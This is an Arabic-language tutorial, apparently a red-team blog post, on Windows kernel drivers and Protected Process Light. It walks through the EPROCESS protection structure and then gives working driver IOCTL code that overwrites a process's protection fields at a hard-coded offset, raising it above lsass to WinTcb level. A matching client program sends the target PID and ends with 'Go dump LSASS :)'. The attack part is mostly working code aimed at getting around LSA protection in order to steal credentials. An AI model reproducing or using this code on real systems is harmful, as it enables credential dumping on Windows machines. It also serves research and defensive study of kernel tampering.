Windows Driver (Part 2)

Introduction to Protected Processes

في Part 1 قدرنا نكتب Driver و Client بسيط. في هذا الجزء رح نتعمق في موضوع Protected Processes وكيف نقدر نتلاعب فيها. في البداية Protected Processes هي عبارة عن security feature تستخدم لحماية system processes وال resources الخاصة بها. أبسط مثال هو Protected Process Light(PPL) الي موجود على lsass.exe :

نقدر نفعل RunAsPPL لل lsass عن طريق Registry:

Digging into LSASS Protection

ال EPROCESS هو عبارة عن structure تقدر تتخيله مثل object يتخزن فيه كل المعلومات الخاصة بال process مثل PID, Token Information والي رح نركز عليها احنا Protection. نقدر نشوف كل ال members في هذا ال Structure عن طريق هذا الأمر :

kd> dt nt!_EPROCESS

الي رح نركز عليها هي:

SignatureLevel
SectionSignatureLevel
Protection (_PS_PROTECTION)

نقدر نتعمق ونشوف ال structure الخاص ب PS_PRTECTION_:

الحلو ان هذا ال sturcture documented من Microsoft هنا:

typedef struct _PS_PROTECTION {
    union {
        UCHAR Level;
        struct {
            UCHAR Type   : 3;
            UCHAR Audit  : 1;                  // Reserved
            UCHAR Signer : 4;
        };
    };
} PS_PROTECTION, *PPS_PROTECTION;

typedef enum _PS_PROTECTED_SIGNER {
    PsProtectedSignerNone = 0,      // 0
    PsProtectedSignerAuthenticode,  // 1
    PsProtectedSignerCodeGen,       // 2
    PsProtectedSignerAntimalware,   // 3
    PsProtectedSignerLsa,           // 4
    PsProtectedSignerWindows,       // 5
    PsProtectedSignerWinTcb,        // 6
    PsProtectedSignerWinSystem,     // 7
    PsProtectedSignerApp,           // 8
    PsProtectedSignerMax            // 9
} PS_PROTECTED_SIGNER, *PPS_PROTECTED_SIGNER;

طيب احنا قدرنا نشوف Protection level الخاص بال lsass والي هو 0x41 وتم الوصول له عن طريق دمج Signer و Type. فيمكن تمثيلها هكذا:

Level

Signer

Type

PS_PROTECTED_LSA_LIGHT (0x41)

Lsa (4)

Protected Light (1)

الفكرة الأن هي يا نشيل هذه ال protection كاملة من ال Process او نسوي process ونحط لها protection اعلى من lsass. انا رح اروح مع الخيار الثاني لأنه امتع شوي. رح نعرف نفس ال Structure الي شفناه في WinDBG و Microsoft ورح نعرف structure جديد ياخذ ال PID من Client:

header.h

typedef struct _PS_PROTECTION
{
    UCHAR Type : 3;
    UCHAR Audit : 1;
    UCHAR Signer : 4;
} PS_PROTECTION, * PPS_PROTECTION;

typedef struct _PROCESS_PROTECTION_INFO
{
    UCHAR SignatureLevel;
    UCHAR SectionSignatureLevel;
    PS_PROTECTION Protection;
} PROCESS_PROTECTION_INFO, * PPROCESS_PROTECTION_INFO;

struct ClientProcess
{
	int PID;
};

رح نستخدم PsLookupProcessByProcessId عشان نوصل EPROCESS structure الخاص بال process. ال offset الخاصة ب PPROCESS_PROTECTION_OFF حاطها hard coded تقدرون تسون structure و function جديد يجيب ال offset المناسب بكل Windows version بس ما رح اتطرق لها. واخر شي سويته هو اني حطيت Protection Level اعلى من lsass:

case WINDRIVER_IOCTL_FUN2:
	{
		DbgPrint("[+] WINDRIVER_IOCTL_FUN2 called\n");
		ClientProcess* target = (ClientProcess*)stack->Parameters.DeviceIoControl.Type3InputBuffer;
		PEPROCESS EProcess = NULL;
		status = PsLookupProcessByProcessId((HANDLE)target->PID, &EProcess);
		DbgPrint("[+] Adding protection to: %d\n", target->PID);
		PROCESS_PROTECTION_OFF* ProcProtection = (PROCESS_PROTECTION_OFF*)(((ULONG_PTR)EProcess) + 0x6c8);
		ProcProtection->SignatureLevel = 0;
		ProcProtection->SectionSignatureLevel = 0;
		ProcProtection->Protection.Type = 2;
		ProcProtection->Protection.Signer = 6;
		ObDereferenceObject(EProcess);
		break;
	}

ال Protection الحالي تم حسابه ليكون اعلى من lsass:

Level

Signer

Type

PS_PROTECTED_WINTCB (0x62)

WinTcb (6)

Protected (2)

اخر شي بنسويه هو تعديل ال Client code:

int main(int argc, char* argv[])
{
    // Open a handle to WinDriver
    printf("[+] Opening handle to driver\n");
    HANDLE hDriver = CreateFile(L"\\\\.\\WinDriver", GENERIC_WRITE, FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, 0, nullptr);

    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[-] Failed to open a handle %d", GetLastError());
        return 1;
    }
    
    ClientProcess info;
    info.PID = atoi(argv[1]);

    printf("[+] Target process: %s\n", argv[1]);
    
    // Call WINDRIVER_IOCTL_FUN2
    printf("[+] Calling WINDRIVER_IOCTL_FUN2\n");
    BOOL status = DeviceIoControl(
        hDriver,
        WINDRIVER_IOCTL_FUN2,
        &info,
        sizeof(info),
        nullptr,
        0,
        nullptr,
        nullptr);
    
    printf("[+] Protection Applied\n");
    printf("[+] Go dump LSASS :) \n");
    
    if (!status) {
        printf("[-] failed to call WINDRIVER_IOCTL_FUN2\n");
    }
   
    printf("[+] Closing handle\n");
    CloseHandle(hDriver);
}

وهذه النتيجة:

References

Blog - SpecterOpsSpecterOps

Do You Really Know About LSA Protection (RunAsPPL)?itm4n’s blog

Bypassing LSA Protection without Mimikatz on Windows 10 - Red CursorRed Cursor

PreviousWindows Driver (Part 1)

Last updated 2 years ago

Was this helpful?